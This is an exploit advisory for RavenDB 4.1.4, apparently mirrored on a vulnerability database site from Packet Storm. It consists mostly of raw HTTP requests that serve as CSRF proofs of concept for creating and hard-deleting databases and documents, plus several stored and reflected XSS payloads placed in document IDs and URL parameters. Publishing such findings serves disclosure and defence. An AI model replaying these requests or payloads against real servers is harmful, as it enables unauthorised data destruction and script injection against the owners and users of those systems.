Lucene search
K

RavenDB 4.1.4 Cross Site Request Forgery / Cross Site Scripting

🗓️ 25 Feb 2019 00:00:00Reported by Ozer GokerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 70 Views

RavenDB 4.1.4 Multiple Vulnerabilities - CSRF and XS

Code
`##################################################################################################################################  
# Exploit Title: RavenDB 4.1.4 | Multiple Vulnerabilities  
# Date: 25.02.2019  
# Exploit Author: Ozer Goker  
# Vendor Homepage: https://ravendb.net  
# Software Link: https://ravendb.net/download  
# Version: 4.1.4  
##################################################################################################################################  
  
Introduction  
  
Hibernating Rhinos, a global provider of database infrastructure solutions,  
empowers Fortune 500 companies and enterprises across the globe to process  
online transactions through an open source platform. RavenDB is the  
industryas first fully-transactional, NoSQL ACID database that combines  
scalability, high-availability, speed and performance. The company produces  
two ORM tools, NHibernate and Entity Framework Profilers, that inspect,  
analyze and suggest improvements to database access patterns in  
applications. Hibernating Rhinos is headquartered in Hadera, Israel with  
offices in the U.S. and Poland and extends its reach through over 1500+  
customers worldwide.  
  
#################################################################################  
  
Vulnerabilities: CSRF | XSS Reflected & Stored  
  
#################################################################################  
  
CSRF details:  
  
#################################################################################  
  
CSRF1  
  
Create Database  
  
PUT /admin/databases?name=testdb&replicationFactor=1 HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)  
Gecko/20100101 Firefox/65.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:8080/studio/index.html  
Content-Type: application/json; charset=utf-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 120  
DNT: 1  
Connection: close  
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302  
  
{"DatabaseName":"testdb","Settings":{},"Disabled":false,"Encrypted":false,"Topology":{"DynamicNodesDistribution":false}}  
  
  
  
#################################################################################  
  
CSRF2  
  
Delete Database  
  
DELETE /admin/databases HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)  
Gecko/20100101 Firefox/65.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:8080/studio/index.html  
Content-Type: application/json; charset=utf-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 44  
DNT: 1  
Connection: close  
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302  
  
{"HardDelete":true,"DatabaseNames":["testdb"]}  
  
  
#################################################################################  
  
CSRF3  
  
Create Document  
  
POST /databases/testdb/bulk_docs HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)  
Gecko/20100101 Firefox/65.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:8080/studio/index.html  
Content-Type: application/json; charset=utf-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 119  
DNT: 1  
Connection: close  
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302  
  
{"Commands":[{"Document":{"Name":"...","@metadata":{"@collection":null,"@id":"testdoc"}},"Id":"testdoc","Type":"PUT"}]}  
  
#################################################################################  
  
CSRF4  
  
Delete Document  
  
DELETE /databases/testdb/studio/collections/docs?name=%40all_docs HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)  
Gecko/20100101 Firefox/65.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:8080/studio/index.html  
Content-Type: application/json; charset=utf-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 17  
DNT: 1  
Connection: close  
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302  
  
{"ExcludeIds":[]}  
  
#################################################################################  
  
XSS details:  
  
#################################################################################  
  
XSS1  
  
Create Document  
  
POST /databases/testdb/bulk_docs HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)  
Gecko/20100101 Firefox/65.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:8080/studio/index.html  
Content-Type: application/json; charset=utf-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 170  
DNT: 1  
Connection: close  
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302  
  
{"Commands":[{"Document":{"Name":"...","@metadata":{"@collection":"<script>alert(1)<","@id":"<script>alert(1)</script>"}},"Id":"<script>alert(1)</script>","Type":"PUT"}]}  
  
  
#################################################################################  
  
XSS2  
  
Delete Document  
  
POST /databases/testdb/bulk_docs HTTP/1.1  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)  
Gecko/20100101 Firefox/65.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1:8080/studio/index.html  
Content-Type: application/json; charset=utf-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 85  
DNT: 1  
Connection: close  
Cookie: _ga=GA1.1.781615969.1550605249; _gid=GA1.1.1815245806.1551097302  
  
{"Commands":[{"Id":"<script>alert(1)</script>","Type":"DELETE","ChangeVector":null}]}  
  
#################################################################################  
  
XSS3  
  
URL  
http://127.0.0.1:8080/studio/index.html#databases/documents?&database=testdb%3Cscript%3Ealert(2)%3C/script%3E  
  
METHOD  
Get  
  
PARAMETER  
database  
  
PAYLOAD  
<script>alert(2)</script>  
  
#################################################################################  
  
XSS4  
  
URL  
http://127.0.0.1:8080/studio/index.html#databases/edit?&database=testdb&id=testdoc%3Cscript%3Ealert(3)%3C/script%3E  
  
METHOD  
Get  
  
PARAMETER  
id  
  
PAYLOAD  
<script>alert(3)</script>  
  
#################################################################################  
  
XSS5  
  
URL  
http://127.0.0.1:8080/studio/index.html#databases/status/storage/report?&database=testdb%3Cscript%3Ealert(4)%3C/script%3E  
  
METHOD  
Get  
  
PARAMETER  
database  
  
PAYLOAD  
<script>alert(4)</script>  
  
#################################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation